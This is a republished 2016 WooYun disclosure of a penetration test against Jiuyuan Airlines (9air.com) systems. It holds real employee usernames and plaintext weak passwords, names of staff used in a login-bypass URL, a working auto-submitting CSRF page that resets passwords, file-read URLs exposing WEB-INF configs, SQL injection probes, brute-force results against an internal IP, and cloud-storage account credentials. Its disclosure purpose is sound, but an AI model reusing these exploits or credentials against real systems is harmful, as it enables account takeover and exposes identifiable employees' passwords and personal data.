一次对九元航空的渗透测试

  • 内容
  • 相关

漏洞详情

披露状态:

 

2016-05-05: 细节已通知厂商并且等待厂商处理中
2016-05-05: 厂商已经确认,细节仅向厂商公开
2016-05-15: 细节向核心白帽子及相关领域专家公开
2016-05-25: 细节向普通白帽子公开
2016-06-04: 细节向实习白帽子公开
2016-06-19: 细节向公众公开

简要描述:

看到九元航空在乌云上注册了, 就测试一下

详细说明:

#1 邮箱信息收集+泄漏密码采集, 获取一下邮箱帐号

http://mail.9air.com/

code 区域
[email protected]9air.com
[email protected]9air.com
[email protected]9air.com
[email protected]9air.com
[email protected]9air.com
[email protected]9air.com
[email protected]9air.com
[email protected]9air.com
[email protected]9air.com
[email protected]9air.com
[email protected]9air.com
[email protected]9air.com
[email protected]9air.com
[email protected]9air.com
[email protected]9air.com
[email protected]9air.com
[email protected]9air.com
[email protected]9air.com
[email protected]9air.com
[email protected]9air.com
[email protected]9air.com
[email protected]9air.com
[email protected]9air.com
[email protected]9air.com
[email protected]9air.com
[email protected]9air.com
[email protected]9air.com
[email protected]9air.com
[email protected]9air.com
[email protected]9air.com
[email protected]9air.com
[email protected]9air.com
[email protected]9air.com
[email protected]9air.com
[email protected]jyh9air.com
[email protected]8air.com
[email protected]8air.com
[email protected]8air.com
[email protected]8air.com
[email protected]8air.com
[email protected]8air.com
[email protected]9air.com2015
[email protected]9air.com2015
[email protected]9air.com2015



泄漏敏感文件、通讯录、内网信息和监控信息等

9air-mail.png



#2 业务逻辑

code 区域
http://sms.9air.com/oa!aircrewLogin?username=DingJun&airuser.aircrewName=丁军&airuser.aircrewDepartment.aircrewDeptCode=CW05&dutycode=A
直接进去了
分析后, 发现username、airuser.aircrewName、airuser.aircrewDepartment.aircrewDeptCode三个正确就可以进去了
实例1:
http://sms.9air.com/oa!aircrewLogin?username=sms&airuser.aircrewName=SMS&airuser.aircrewDepartment.aircrewDeptCode=CW05&dutycode=A
实例2:
http://sms.9air.com/oa!aircrewLogin?username=gaoweixing&airuser.aircrewName=高卫星&airuser.aircrewDepartment.aircrewDeptCode=CW05&dutycode=A



SMS

9air-sms.png



9air-sms-1.png



高卫星

9air-sms-2.png



crew系统修改密码处

code 区域
http://crew.9air.com/personal_change_password.jsp



code 区域
<!doctype html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="Generator" content="EditPlus®">
<meta name="Author" content="">
<meta name="Keywords" content="">
<meta name="Description" content="">
<title>Document</title>
</head>
<body>
<form method="post" action="http://crew.9air.com/personal_change_password.jsp" id="edit">
<input name="newPass" type="text" value="9air.com1">
<input name="validPass" type="text" value="9air.com1">
</form>

</body>

<script>
document.getElementById("edit").submit();
</script>
</html>



Crew系统, 修改密码处未验证验证原密码, 结合邮箱, 可CSRF实现密码修改

#3 文件读取

code 区域
sms.9air.com/reqManagement.action?fileName=web.txt&&fileAddr=/WEB-INF/web.xml
sms.9air.com/reqManagement.action?fileName=web.txt&&fileAddr=/WEB-INF/titlees/log4j.properties



9air-sms-file.png



9air-sms-file1.png



#4 SQL注入

code 区域
http://oa.9air.com:8081//services/



9air-oa-2.png



举例

9air-oa-3.png



1' or 'a'='a 结果为4

1' or 'a'='b 结果为5

用户名长度

9air-oa-6.png



具体可参考

WooYun: 泛微协同商务系统e-cology某处SQL注入(附验证中转脚本)

WooYun: 泛微OA某接口无需登录可执行任意SQL语句(附脚本)

#5 帐号体系控制不严, 进入多个系统

http://crew.9air.com/

code 区域
dingjun	9air.com
zhaohaili
wangxiong
lixiaoming
chenli
chenhao
lijinglin
caoyuanhe
zhangben
liuyongqiang
jiazhenxiu
lijiayi 888888
wangren
liuguangping
limengkan
shizhaojin
fengbo
jiangchao
yangsibo
zhuxingyan
songyuan
yangxiangdong
wangqi
wangyao
wuyuhao
houfeiyu
liuyiming
hudongli
caoning
yangjin
yangyidong
fuyu
chenweibin
caoyuanhe
yangjian
chenyupei
wenxudong
sunshina
liujingwen
zhaoyafang
yanyu
zhangxinyu
cuiyongtao
qiaozhu
lijiaming
zhaodongchen
hejian
hanfanliang
changxiaobo
xulihao
fangxiangyun
maquan
xiaohaodi
wangyiran
lichaoa
liangshuang
tianmeng
liuquan
huqigang
yangqining
heli 8air.com
gechunlian abc123456
liyuzhu 123456
hejiangtao 123456
liuyingbing a123456



9air-crew1.png



oa.9air.com

举例说明, 还有很多的

code 区域
高卫星 9air.com
关锋 9air.com



9air-oa.png



9air-oa-1.png



http://203.156.207.29:8080/mes/

code 区域
Payload1	Payload2	Status	Length
niejiangnan aaaa 200 18830
yanjun 123456 200 15292
luochihong aaaa 200 8547
xuweibiao aaaa 200 8350
huanghe aaaa 200 8344
yiniansheng aaaa 200 7868
wangchunhui aaaa 200 1035
sujianlin aaaa 200 1033
liusiqi aaaa 200 1031
xuqinghai aaaa 200 1030



9air-mes.png



#5 外围信息

code 区域
微云 [email protected]密码:dingjianchejian
百度云 [email protected],密码:9air.com;
[email protected],密码:9air.com

 

漏洞证明:

已证明!

修复方案:

1、邮箱弱密码不能只是发邮件, 是否可以强制修改

2、业务逻辑部分, 重新设计一下

3、OA的SQL注入问题, 联系泛微吧

4、多个系统账户体系问题, 添加验证码+修改弱口令

5、你们更专业

版权声明:转载请注明来源 harbour_bin@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2016-05-05 15:48

厂商回复:

万恶的弱密码。

最新状态:

暂无


本文标签:

版权声明:若无特殊注明,本文皆为《安三》原创,转载请保留文章出处。『鹦鹉搜索』

百度收录:百度未收录『点击提交』

本文链接:一次对九元航空的渗透测试 - https://www.15qq.cn/wooyun/601.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注

允许邮件通知